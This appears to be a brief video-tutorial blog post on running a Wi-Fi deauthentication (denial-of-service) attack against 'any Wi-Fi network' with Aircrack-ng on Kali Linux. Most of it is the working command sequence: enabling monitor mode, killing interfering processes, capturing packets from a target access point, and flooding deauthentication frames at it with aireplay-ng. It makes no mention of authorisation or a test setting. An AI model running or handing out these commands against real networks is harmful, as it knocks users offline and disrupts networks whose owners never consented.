Video Tutorials Wireless Attacks

How to Perform Wi-Fi Deauthentication Attack on Any Wi-Fi Network – Aircrack-ng and Kali Linux

Hey Guys, In this video i show you how to perform Wi-Fi deauthentication attack on any Wi-Fi Network.

Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point.

Commands:
Put your Interface in monitor mode:
airmon-ng start wlan0

Kill ALL of the potentially problematic pids for aireplay-ng permanently
airmon-ng check kill

Capturing Packets
airodump-ng -b (Mac Address of AP) -c (Channel) wlan0mon

Deauthentication
aireplay-ng -0 0 -a (Mac Address of AP) -c (Clinet mac address) wlan0mon

 

Video:

https://youtu.be/3ztLfrdl-Gs